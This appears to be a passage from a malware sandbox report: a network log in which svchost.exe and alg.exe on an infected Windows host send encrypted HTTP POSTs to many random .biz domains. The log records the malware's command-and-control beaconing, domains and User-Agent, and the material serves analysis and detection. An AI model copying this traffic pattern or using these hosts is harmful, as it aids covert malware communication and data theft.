Oct 8, 2024 15:29:23.259205103 CEST | 786 | OUT | Data Raw: 8b 82 aa f7 f1 d2 70 c3 06 03 00 00 be 3c be 0b c7 22 ae 29 6e d5 7f 19 fd f1 bc 0b 4e b8 71 2f 9e 7f 90 5c 5b db 5a e8 94 7f 5b 52 31 a0 7f 86 8b b6 0e 9d 55 52 f5 28 6d 87 11 04 a1 24 6d cd 46 26 e3 43 17 8e 7a f6 17 66 6e e4 ed cb 75 c5 2b 36
Oct 8, 2024 15:29:23.713265896 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5579e90d52af55dea770622bcf60d51f|8.46.123.33|1728394163|1728394163|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.4 | 50141 | 34.211.97.45 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:23.593101978 CEST | 352 | OUT | POST /vbfsvakjwax HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:23.593122005 CEST | 778 | OUT | Data Raw: ee a3 56 f8 50 44 60 50 fe 02 00 00 c6 2d 5c 64 ed 02 0d bb 01 f3 40 a6 eb 63 20 e3 31 0d 0c 79 e8 b0 18 d6 35 11 b1 bb 72 62 22 18 ce a9 2e c2 3c 66 15 4f a4 b8 b9 60 90 17 1e ca e0 79 f7 6d 9f 1e 66 c6 a6 dc b2 2e 8e b3 b8 75 f8 b2 4e 80 47 f1
Oct 8, 2024 15:29:24.473031044 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c978ce649a648a373d1a94e42b827f67|8.46.123.33|1728394164|1728394164|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.4 | 50142 | 44.213.104.86 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:23.737740993 CEST | 354 | OUT | POST /gwahjspinmwkm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:23.737752914 CEST | 786 | OUT | Data Raw: 50 e6 17 d6 12 a4 0e 9f 06 03 00 00 10 f0 65 67 da 1f 1b e3 9f aa 8c db ab bd 71 b2 78 8b 93 df 07 67 ff e3 a5 49 3b 5a b7 a1 f5 64 82 2a c2 45 cc 47 5c 4d 36 4b 09 61 47 7e b0 04 c1 ca e7 42 ed 3d a6 af 82 9d 4f fd 96 95 a4 9c 44 87 5e 4b e7 77
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: PegqxgI;Zd*EG\M6KaG~B=OD^Kw8s"GWIOaeY4M)KHc& FQ.+0;6Yca.e&]COT S\*:],f!h9{,W#J
Oct 8, 2024 15:29:24.238662004 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=927d703718275eb93336ee5d44d24be7|8.46.123.33|1728394164|1728394164|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.4 | 50144 | 44.221.84.105 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:24.274794102 CEST | 354 | OUT | POST /wmdddjvyuy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:24.274823904 CEST | 786 | OUT | Data Raw: 51 50 1c 52 10 2a 91 2a 06 03 00 00 24 e8 5a 8d 87 25 35 73 8a 7c 33 74 7c d4 78 bf d4 58 5b f6 8d 05 e7 d1 b9 d6 9d 13 1d 48 aa 89 0d 31 e6 64 18 86 e4 e3 bc 21 c7 39 c1 06 77 27 1b 75 7d e8 38 ba f2 5a 5a 82 d8 7c 70 44 01 b9 32 e7 9a 7a 81 9b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: QPR**$Z%5s|3t|xX[H1d!9w'u}8ZZ|pD2zz(tY'q3D4<l +l'H[.&7NSE1SpoX-#*`)g~n[I\hBwq)L3A
Oct 8, 2024 15:29:24.741008997 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5e67b46d65812508c9d4e2802b9ae581|8.46.123.33|1728394164|1728394164|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.4 | 50145 | 47.129.31.212 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:24.784451962 CEST | 349 | OUT | POST /kjomliy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:24.784451962 CEST | 778 | OUT | Data Raw: 5e 60 d7 a8 88 23 11 b7 fe 02 00 00 b1 04 a3 b9 7c de 06 b0 c3 6f b8 d5 7f 3d a2 74 51 82 41 04 f1 3a 67 ba 26 1f ec b5 bc 0d ae 4e bf c2 c0 ba a5 db 39 b1 af c4 ed b0 65 c4 6a fd 1d 55 c2 1e 4e 5d a7 0f b0 23 7e 19 e7 bf 83 d6 df 61 87 27 62 d2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ^`#|o=tQA:g&N9ejUN]#~a'biE:yu"4$l?!=W))(o4@(H>-m.>J6-:]/QMC%7=FhyX]v%7H<9^g;H\qyAA)P=&-+'D
Oct 8, 2024 15:29:26.110538960 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=89f4e3c3b080c10994f3b66d106b071c|8.46.123.33|1728394165|1728394165|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.4 | 50146 | 54.244.188.177 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:24.953923941 CEST | 357 | OUT | POST /gimbgsoaqvqvqhf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:25.694133997 CEST  408                IN         HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6cbb374b50f34825b1daf058155f6522|8.46.123.33|1728394165|1728394165|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
110         192.168.2.4  50147        3.254.94.185    80                4476  C:\Windows\SysWOW64\svchost.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:29:25.898819923 CEST  342                OUT        POST /k HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:26.767930984 CEST  407                IN         HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a037e0ad562550722ad5710b71686a21|8.46.123.33|1728394166|1728394166|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
111         192.168.2.4  50149        18.141.10.107   80                4476  C:\Windows\SysWOW64\svchost.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:29:27.166729927 CEST  351                OUT        POST /tywwnha HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:28.506442070 CEST  410                IN         HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9fffd3c2fca102894b3a8525b3b7624e|8.46.123.33|1728394168|1728394168|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
112         192.168.2.4  50150        18.208.156.248  80                2912  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:29:27.282533884 CEST  357                OUT        POST /jkmxqkwmcvmo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.282533884 CEST778OUTData Raw: 59 e9 7e de 92 6b b2 5b fe 02 00 00 44 c5 af 38 af 83 f7 59 06 d2 d8 38 af 43 13 17 46 6c 88 43 15 44 cc 6d 90 6c 26 ae 82 73 58 4a 15 c8 46 93 79 f4 d7 cd bb 87 a8 c9 81 93 35 87 27 0e b8 c4 c0 a9 9a 8b 5c 5e 51 69 83 36 58 80 d4 20 b6 ca ad 03
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Y~k[D8Y8CFlCDml&sXJFy5'\^Qi6X Rt![sGRC$|*)[ w>S#yLx|K1IV@*3SmgAr&pB{D=UXZx3A/NEG->cMb7`|?
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.732120991 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=40bcfdb0e960d96bb2e583c20390c373|8.46.123.33|1728394167|1728394167|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.4 | 50151 | 13.251.16.150 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:28.379132032 CEST | 344 | OUT | POST /tm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:28.379172087 CEST | 778 | OUT | Data Raw: 65 2f c4 d9 09 5c 29 23 fe 02 00 00 81 e5 06 48 01 d1 6f 51 80 1a 14 1a 5e a9 d0 82 52 73 55 38 55 df 5c 45 4d 84 86 51 75 3c 0c b2 37 ee da a3 71 fd 05 7d 1d 19 aa ee 1f 71 e6 97 18 4e 83 99 8c 2e 7e 9f cf 83 6b 6d ae 3a 3e 5b fe b3 a9 77 3c 67
Data Ascii: e/\)#HoQ^RsU8U\EMQu<7q}qN.~km:>[w<g^t.-Y MOLWY*&t$9&t'5fKBoFv!B2FHuqHY:B9NglOZc<Y.g_] A3[_Y$=Xd\GLSp
Oct 8, 2024 15:29:29.697092056 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5e5b3847dbe0f308e0b3bbcd6cbfdf01|8.46.123.33|1728394169|1728394169|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.4 | 50152 | 34.246.200.160 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:28.546307087 CEST | 353 | OUT | POST /kyoprhcrfsm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pwlqfu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:28.546348095 CEST | 786 | OUT | Data Raw: b6 ea 95 2e 46 45 9d 0a 06 03 00 00 7b b3 e7 1c 6c 93 aa 13 10 87 d6 e3 84 b5 30 50 f8 91 da d1 72 39 a0 cb 21 51 cf 2a 32 91 34 77 00 e9 01 45 fe 59 db a9 bf 09 0a b2 ac 2f ac 1a 5c a0 bf a7 24 8e 26 3e 20 ca 42 1a 9a dc 93 b3 ea ca d2 43 10 a4
Data Ascii: .FE{l0Pr9!Q*24wEY/\$&> BCySsaJ6@rU{J]J}Z`t'H?"eZD2A-0tNFmR0{s9Hs}yA_$=J4s{9
Oct 8, 2024 15:29:29.303603888 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=88b1f0ea97c3aca065ce742b6c2938d3|8.46.123.33|1728394169|1728394169|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.4 | 50154 | 47.129.31.212 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:30.046932936 CEST | 358 | OUT | POST /avcgsychncpte HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:30.048455000 CEST | 786 | OUT | Data Raw: 10 7e e5 4b 37 4d ee 12 06 03 00 00 9d 76 d2 bc d8 62 14 82 0f 1c 69 ca 56 05 2e 81 55 7d 98 72 6f 85 a5 f6 98 3f b6 7e 65 e6 c2 62 b6 4f d0 32 e4 e8 23 36 3a 6e 7a 0f 73 f7 68 df d5 21 da dd fc cb 4e 69 4f c1 36 39 9d a3 01 7d c6 34 13 6f 4e 8c
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ~K7MvbiV.U}ro?~ebO2#6:nzsh!NiO69}4oN1'Wz_"m5KkB52t/l|@j1[&KYux7Bq~+l7i0dvl2-f i>['^h.^?@x5
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.371695042 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1b5b4e3f54bf33be10f9a72cbb355756|8.46.123.33|1728394171|1728394171|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.4 | 50155 | 34.246.200.160 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:30.521245956 CEST | 353 | OUT | POST /udhgonlj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:30.521275997 CEST | 778 | OUT | Data Raw: 96 e3 31 db 90 05 dc df fe 02 00 00 9f 3c 65 8f 6f 3c 76 48 f9 c1 09 f5 af e4 a1 5b a8 e3 ea 65 26 cc b2 f7 92 5d 07 aa 47 b5 fc df 96 ea e8 cb a3 93 ac 8c 86 11 37 0c e0 6e a9 60 5c 6d 0a 0e 75 71 0b f9 9a 89 cd 72 0f f2 e8 31 94 78 9e 7d 15 1f
Data Ascii: 1<eo<vH[e&]G7n`\muqr1x}/)PFUKcgVxG03$szec-)>|[7hY@x.2H?p92O9)lHC<K2rrZO?L1#eB)SYF
Oct 8, 2024 15:29:31.261063099 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ffc6fa1790eaf94826993a9aff1194b3|8.46.123.33|1728394171|1728394171|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.4 | 50156 | 3.94.10.34 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:31.392673969 CEST | 349 | OUT | POST /dumoc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:31.392673969 CEST | 786 | OUT | Data Raw: af 72 b7 67 4b 76 5e 9d 06 03 00 00 c3 75 05 d7 39 3a 81 7d 98 6b 00 aa f5 5f 14 8c a8 ee ad 0e 51 d7 fb cb b8 ca 06 7d 08 4a a8 c0 d2 10 6b f8 fe 52 22 fc eb 47 3c 05 31 0c 7c 25 2a 9c 59 43 37 5d 60 4f a9 78 fb e8 f5 d7 15 f4 7b 24 50 2f 99 b0
Data Ascii: rgKv^u9:}k_Q}JkR"G<1|%*YC7]`Ox{$P/?U4g,m{"5%hgztFi3|xZ|EoYnNYt}}(>'2i!l>-LdA:FpM`^+'1'CZA(GB$>
Oct 8, 2024 15:29:31.865526915 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bbe903bf2d5ae9ab37d69bc1246f7102|8.46.123.33|1728394171|1728394171|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
